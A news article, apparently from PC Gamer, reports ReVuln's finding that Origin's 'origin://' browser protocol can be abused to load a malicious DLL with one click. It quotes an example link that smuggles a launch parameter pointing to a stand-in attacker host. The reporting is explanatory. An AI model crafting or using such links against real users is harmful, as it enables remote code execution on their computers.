Origin browser protocol exploit shown to execute malicious software with a single click


A security flaw has surfaced in the browser protocol Origin uses to launch games through custom links using the "origin:" structure. As Ars Technica reports, research group ReVuln demonstrates how a malicious program can be executed via a modified Origin link masquerading as a game launch.

Normally, an Origin game calls for a "origin://LaunchGame/[GameID]" command when launching through a browser. According to ReVuln, attackers can simply modify this path to something like "origin://LaunchGame/[GameID]?CommandParams= -openautomate ATTACKER_IPevil.dll" to toxify the command, causing it to run a foreign DLL.

In addition to a paper on its findings, ReVuln also recorded a brief video of the exploit in action.

Responding to Ars, an EA rep said, "Our team is constantly investigating hypotheticals like this one as we continually update our security infrastructure."

The issue isn't exclusive to Origin—other programs using this kind of protocol are vulnerable, including Steam, which the same group demonstrated attacks on in October .

The problem is in the same family as any other phishing attack launched from malformed links or trojan email attachments. In the end, the safest course is to never click on un-vetted links containing funky-looking parameters, be it an Origin launch or otherwise. Or, in the words of Dr. Breen: "Be wise. Be safe. Be aware."

Omri Petitte

Omri Petitte is a former PC Gamer associate editor and long-time freelance writer covering news and reviews. If you spot his name, it probably means you're reading about some kind of first-person shooter. Why yes, he would like to talk to you about Battlefield. Do you have a few days?